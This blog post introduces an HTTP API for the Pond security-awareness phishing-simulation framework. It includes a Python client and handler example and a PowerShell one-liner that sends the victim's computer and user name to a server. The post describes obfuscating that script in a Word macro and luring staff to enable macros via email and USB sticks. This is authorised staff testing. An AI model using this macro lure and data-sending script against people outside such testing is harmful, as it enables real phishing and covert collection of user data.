One of the most popular developments of mine, and in my opinion one of the most effective at what it is aimed to do, is the Pond Security Awareness Framework. In my last post about it I introduced the concept of multiple campaigns and collaboration via SignalR: multiple users could work on the same campaign, saving and resuming work on it whenever they please. My problem, however, was that the attack vector was still limited to email – I wanted more. So I have introduced an API, meaning that any method of attack can be used, as long as it can execute code that POSTs to a URL.

Further to this, the code has now – finally – been made public under the Apache license.

the api

The decision to develop an API came after watching this great talk by Ryan Barrett from BSidesSF 117:

It became clear to me that to effectively test your staff you need to simulate every possible vector that an attacker could possibly take.

The API is fairly straightforward, really. It is fed:

  • The API key.
  • Three variables that can be used for whatever purpose you see fit; they are referred to as user name, user email and user agent.

The POST body is a JSON object with these four fields (the PowerShell hashtable shown later in this post produces exactly this via ConvertTo-Json):

{ "ApiKey": "API KEY", "UserEmail": "USER EMAIL", "UserName": "USER NAME", "UserAgent": "USER AGENT" }

Providing that you are able to POST this to the ASHX handler (apiHandler.ashx), you can record the results of vectors other than email. For example:

  • XSS watering hole attacks.
  • Modified executables offered for download.
  • Document macros delivered via USB stick.
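To make the exchange concrete, here is an added example written for this post (it is not Pond's own apiHandler.ashx, whose internals are not shown here): a client that builds the JSON body with the four field names above, and a hypothetical stand-in handler that checks the body, rejects a bad API key and records the three user variables. The API key, hostnames and usernames are constructed sample values.

```python
import hmac
import json
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.request import Request, urlopen

# Field names are the ones Pond documents for apiHandler.ashx.
FIELDS = ("ApiKey", "UserEmail", "UserName", "UserAgent")

# Constructed sample key; a real deployment copies it from Pond's 'Info' tab.
VALID_API_KEY = "0123456789abcdef"

# Stand-in for whatever the real handler writes to the campaign database.
RESULTS = []


def build_payload(api_key, user_email, user_name, user_agent):
    """Client side: build the JSON body Pond expects (same shape ConvertTo-Json emits)."""
    return json.dumps({"ApiKey": api_key, "UserEmail": user_email,
                       "UserName": user_name, "UserAgent": user_agent})


def validate_payload(raw):
    """Server side: parse and check a body. Returns (http_status, record_or_error)."""
    try:
        data = json.loads(raw)
    except ValueError:
        return 400, "body is not JSON"
    if not isinstance(data, dict):
        return 400, "body is not a JSON object"
    missing = [f for f in FIELDS if f not in data]
    if missing:
        return 400, "missing fields: " + ", ".join(missing)
    # Constant-time comparison so the key cannot be guessed byte by byte.
    if not hmac.compare_digest(str(data["ApiKey"]), VALID_API_KEY):
        return 403, "bad API key"
    # Never store the key itself; only the three free-form user variables.
    return 200, {f: str(data[f]) for f in FIELDS if f != "ApiKey"}


class StandInHandler(BaseHTTPRequestHandler):
    """Hypothetical replacement for apiHandler.ashx, used only for this demo."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        status, result = validate_payload(self.rfile.read(length))
        if status == 200:
            RESULTS.append(result)
        self.send_response(status)
        self.end_headers()
        self.wfile.write(b"OK" if status == 200 else result.encode())

    def log_message(self, *args):
        pass  # keep the demo quiet


def post_result(url, body):
    """Client side: POST the JSON body; returns the HTTP status code."""
    req = Request(url, data=body.encode(), method="POST",
                  headers={"Content-Type": "application/json"})
    try:
        with urlopen(req) as resp:
            return resp.getcode()
    except HTTPError as e:
        return e.code


def run_demo():
    """Start the stand-in handler on loopback, send one good and one bad POST."""
    server = HTTPServer(("127.0.0.1", 0), StandInHandler)
    port = server.server_address[1]
    threading.Thread(target=server.serve_forever, daemon=True).start()
    url = f"http://127.0.0.1:{port}/apiHandler.ashx"
    good = post_result(url, build_payload(VALID_API_KEY, "WS-042", "CORP\\alice", "usb-macro"))
    bad = post_result(url, build_payload("wrong-key", "WS-042", "CORP\\alice", "usb-macro"))
    server.shutdown()
    server.server_close()
    return good, bad, list(RESULTS)


if __name__ == "__main__":
    print(run_demo())
```

The point of the stand-in is the shape of the contract: the client only needs to be able to reach the handler URL with a POST, so the same body can be produced from a macro, a dropped executable or a watering-hole page.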

One example of a test that I've done at work is executing obfuscated PowerShell from a Word macro, and using a bit of social engineering to dupe the victim into enabling macros. The document is distributed via email and USB stick.

The API key is found under the ‘Info’ tab:

The PowerShell one-liner that forms and POSTs the JSON message is as follows (the -Uri is left blank in the listing; it takes the URL of your apiHandler.ashx):

$obj = @{ ApiKey = "API KEY"; UserEmail = $env:COMPUTERNAME; UserName = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name; UserAgent = "Test Name" }; $json = $obj | ConvertTo-Json; Invoke-WebRequest -Uri "" -Method POST -Body $json;

This script is then compressed using the compression script that is included with Pond:

… and inserted into a Word document macro:

Upon opening the document the user is encouraged to enable macros in order to view the "encrypted" document:

The macro then POSTs details of the user to the Pond handler, recording a result for the action:

the source

As promised some time ago, the source for Pond would eventually be released. Well, now it can be found on GitHub.
